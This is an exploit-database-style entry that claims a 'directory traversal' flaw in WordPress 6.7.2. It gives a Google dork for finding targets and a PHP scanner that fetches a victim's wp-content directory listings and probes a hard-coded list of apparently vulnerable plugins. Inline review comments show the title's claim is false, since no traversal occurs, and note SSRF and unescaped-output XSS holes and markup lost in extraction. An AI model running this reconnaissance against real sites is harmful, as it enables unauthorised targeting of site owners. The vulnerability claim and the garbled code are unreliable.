# Exploit Title: WordPress ( Directory Traversal )
# Google Dork: inurl:/wp-content/plugins/
# Date: 2025-03-11
# Exploit Author: Emiliano Febbi
# Vendor Homepage: https://it.wordpress.org/
# Software Link: https://it.wordpress.org/download/
# Version: 6.7.2
# Tested on: Windows 10
[code]
Wordpress Directory Traversal
';
/*
 * Request handler: runs only when the form field `victim_url` was POSTed.
 * It makes three kinds of outbound HTTP fetches against the supplied base URL:
 *   1. <url>wp-content/plugins/  - body is printed if non-empty
 *   2. <url>wp-content/          - body is printed if non-empty
 *   3. <url>/wp-content/plugins/<slug>/ for each hard-coded slug - slug is
 *      printed when the fetch does not fail
 *
 * NOTE(review): no request built here contains a path-traversal sequence.
 * A "Found" result only shows that the server returned a non-empty body for a
 * directory URL, which usually means an auto-generated index is being served
 * (directory listing exposure), not traversal outside the web root.
 *
 * NOTE(review): WordPress ships placeholder index.php files in wp-content/ and
 * wp-content/plugins/ that return an empty body, so an intact install is
 * expected to land in the "no permission" branches below. Confirm against the
 * target configuration before treating a result as a core WordPress issue.
 *
 * Defender view: listings are turned off at the web server (Apache
 * `Options -Indexes`, nginx `autoindex off`), and the placeholder index.php
 * files should be kept in place. In access logs this script appears as one
 * client requesting many /wp-content/plugins/<slug>/ paths in a short burst.
 *
 * NOTE(review): several echo "" calls and the bare line breaks inside the
 * strings suggest this copy lost HTML markup during extraction; the comments
 * describe the code as shown here.
 */
if(isset($_POST['victim_url'])) {
/* !/wp-content/plugins/! */
// The posted value is used as-is: no scheme check (http/https), no host
// allow-list, no normalisation. If this script is hosted where others can
// reach it, the hosting server will fetch whatever location is posted
// (server-side request forgery class). Requires allow_url_fopen for URLs.
$url = $_POST['victim_url'];
// Plain concatenation, so $url must already end in "/" for this path to be
// well-formed. file_get_contents() returns false on failure; an empty body
// or the string "0" is also falsy and takes the else branch.
if(file_get_contents("$url". "wp-content/plugins/")) {
echo "......................................................................................
";
echo "Directory Traversal on /wp-content/plugins/ Found
";
echo "......................................................................................
";
// Second fetch of the same URL; the probe result above is not reused, so the
// body printed here can differ from the one that passed the check.
$see_dir = file_get_contents("$url". "wp-content/plugins/");
echo "";
// Remote response body is written to the page unescaped: markup or script in
// it runs in the browser of whoever is viewing this tool. htmlspecialchars()
// would be the usual guard.
echo $see_dir;
echo "";
// $url (attacker- or user-supplied POST data) is interpolated unescaped.
echo "
~Plugins Explorer
$url";
echo "@report vuln";
echo "
";
} else {
echo "You do not have permission to read the directory: /wp-content/plugins/ #Try Direct access";
};
/* !/wp-content/! */
// Same probe-then-refetch pattern as above, one directory level up.
if(file_get_contents("$url". "wp-content/")) {
echo "
......................................................................................
";
echo "Directory Traversal on /wp-content/ Found
";
echo "......................................................................................
";
$see_dir2 = file_get_contents("$url". "wp-content/");
echo "";
// Unescaped remote content again (see note on $see_dir).
echo $see_dir2;
echo "";
} else {
echo "You do not have permission to read the directory: /wp-content/ #Try Direct access";
};;
/* !#Directory Traversal Plugins scanner! */
echo "
~Plugins Scanner
plugins list on: $url(*probable dir traversal)";
// Hard-coded plugin directory names (slugs) to probe. The page does not say
// why these were chosen - presumably plugins with published advisories; verify.
// Presence of a directory says nothing about the installed version.
$plugins_scann = array( //update me
"duplicator",
"social-warfare",
"revslider",
"work-the-flow-file-upload",
"media-library-assistant",
"masterstudy-lms-learning-management-system",
"masterstudy-lms-learning-management-system-pro",
"ninja-forms",
"backup-backup",
"nex-forms-express-wp-form-builder",
"imagemagick-engine",
"wp-useronline",
"testimonial-slider-and-showcase",
"school-management-system",
"elementor",
"elementor-pro",
);
foreach($plugins_scann as $plugins_scann2) {
// Unlike the two probes above, this path inserts "/" after $url, so a base URL
// with a trailing slash yields "//wp-content/...". file() returns false when
// the stream cannot be opened (the HTTP wrapper fails on error statuses by
// default), so any response treated as success - including an empty one -
// prints the slug. The else branch is a no-op.
if (false!==file("$url/wp-content/plugins/$plugins_scann2/"))
echo "
$plugins_scann2";
else echo "";
};;;
} else {
// No victim_url posted: nothing is fetched and nothing is printed.
echo "";
};;;;
?>
[/code]